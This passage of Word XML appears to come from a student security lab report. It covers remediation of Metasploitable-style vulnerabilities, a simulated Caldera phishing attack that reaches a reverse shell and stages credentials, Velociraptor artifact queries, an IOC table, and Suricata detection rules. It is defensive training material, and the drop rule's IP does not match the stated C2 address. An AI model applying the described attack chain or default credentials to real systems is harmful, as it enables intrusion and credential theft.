                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">PostgreSQL Weak Creds</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2F2F2F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">6.5</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2F2F2F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CVE-2011-2503</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2F2F2F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">5432/PostgreSQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="36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2F2F2F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Default postgres:postgres credentials enable full DB access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation Plan —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000"/>
        <w:gridCol w:w="1200"/>
        <w:gridCol w:w="17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Vulnerability</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Remediation Step</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1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VSFTPD 2.3.4 Backdoor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P1 — Critical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Upgrade to vsftpd 3.x; if FTP unused, disable service entirely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Low</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Immediate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Samba MS-RPC Shell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P1 — Critical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Update Samba to 3.0.25+; apply smb.conf username map restriction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Low</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Immediate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UnrealIRCd Backdoor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P2 — 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Remove UnrealIRCd package; replace with patched version if needed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Low</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24 hours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Distcc RCE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P2 — High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Disable distcc or bind to localhost only; firewall port 3632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Low</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24 hours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PostgreSQL Weak Creds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P3 — Medium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Change postgres password; revoke unnecessary public grants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Low</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48 hours</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E75B6" w:sz="8" w:space="4"/>
        </w:pBdr>
        <w:spacing w:before="360" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Task 4: Incident Response Simulation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Tools: Velociraptor, MITRE Caldera | Objective: Simulate a phishing attack, collect forensic artifacts, and document the attack path and indicators of compromise.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Phishing Simulation — MITRE Caldera</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Attack Path Summary: A MITRE Caldera phishing payload was deployed against a Windows 10 test VM. The payload delivered an encoded PowerShell command via a simulated malicious link in an email. Upon execution, the payload established a reverse shell connection to the Caldera C2 server (192.168.1.150), harvested local credentials via Mimikatz simulation, and staged them in %TEMP% for exfiltration. The entire kill chain from email delivery to credential staging completed in under 90 seconds, demonstrating the speed of modern phishing attacks and the critical need for rapid detection capability.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600"/>
        <w:gridCol w:w="1000"/>
        <w:gridCol w:w="1960"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Kill Chain Step</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MITRE Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Time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Phishing email delivered to test inbox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T1566.001 — Spearphishing Link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T+0s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User clicked link — payload downloaded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T1204.001 — Malicious Link</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T+8s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PowerShell spawned with encoded command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T1059.001 — PowerShell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T+12s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C2 beacon established to 192.168.1.150</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T1071.001 — Web Protocols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T+18s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Credential harvest executed via memory access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T1003.001 — LSASS Memory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T+45s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Credentials staged in %TEMP%\data.tmp</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T1074.001 — Local Data Staging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T+78s</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Velociraptor — Artifact Collection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Velociraptor queries executed to collect process and network artifacts:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">-- Process artifacts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT Pid, Name, Exe, CommandLine, Username, CreateTime</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">FROM processes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE Name = "powershell.exe" OR Name = "cmd.exe"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">-- Network connection artifacts  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT Pid, Status, Laddr.IP, Laddr.Port, Raddr.IP, Raddr.Port</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">FROM netstat</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE Status = "ESTABLISHED"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">IOCs Collected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800"/>
        <w:gridCol w:w="3060"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>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IOC Type</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0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Significance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Process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powershell.exe — PID 3284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processes table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Spawned by outlook.exe — anomalous parent-child</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Command Line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-EncodedCommand [base64 string]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processes table</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Encoded payload — T1059.001 indicator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Network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192.168.1.150:8080 ESTABLISHED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netstat table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Active C2 channel to Caldera server</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File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C:\Users\User\AppData\Local\Temp\data.tmp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filesystem hunt</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Staged credential data</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E75B6" w:sz="8" w:space="4"/>
        </w:pBdr>
        <w:spacing w:before="360" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Task 5: Network Defense with Open-Source Tools</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Tools: Suricata, Elastic SIEM, CrowdSec | Objective: Create Suricata detection/blocking rules, map alerts to MITRE ATT&amp;CK, and integrate with Elastic SIEM.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Suricata Rules</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">File saved to: workflow/suricata_rule.rules</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># Rule 1: Block known malicious IP (C2 server)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">drop ip 192.168.1.100 any -&gt; any any (msg:"Block Malicious IP - C2"; sid:1000001; rev:1;)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># Rule 2: Detect suspicious outbound HTTP (C2 beacon)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">alert http $HOME_NET any -&gt; $EXTERNAL_NET any (</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  msg:"Suspicious Outbound HTTP - Possible C2 T1071";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  flow:established,to_server;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  http.uri; content:"/beacon";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  classtype:trojan-activity; sid:1000002; rev:1;)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># Rule 3: Detect VSFTPD exploit attempt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">alert tcp $EXTERNAL_NET any -&gt; $HOME_NET 21 (</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  msg:"VSFTPD 2.3.4 Backdoor Attempt T1190";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  flow:established,to_server;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  content:":)";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  classtype:attempted-admin; sid:1000003; rev:1;)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Test procedure: From attacker VM, ping 192.168.1.100 — expected result: traffic dropped, alert in /var/log/suricata/fast.log</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK Alert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600"/>
        <w:gridCol w:w="1100"/>
        <w:gridCol w:w="2000"/>
        <w:gridCol w:w="1860"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="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SID</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Alert Message</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Tactic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Technique ID</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Technique Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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1000001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Block Malicious IP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Command &amp; Control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T1071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Application Layer Protocol</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DROP — block at network level</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1000002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Suspicious Outbound HTTP</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Command &amp; Control</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T1071.001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Web Protocols (HTTP/HTTPS)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ALERT — investigate immediately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1000003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VSFTPD Backdoor Attempt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Initial Access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T1190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Exploit Public-Facing Application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ALERT — trigger IR playbook</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E75B6" w:sz="8" w:space="4"/>
        </w:pBdr>
        <w:spacing w:before="360" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Task 6: Risk Assessment Practice</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Tool: Google Sheets | Objective: Calculate ALE for a ransomware scenario and build a 5x5 risk matrix to visualize organizational risk posture.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
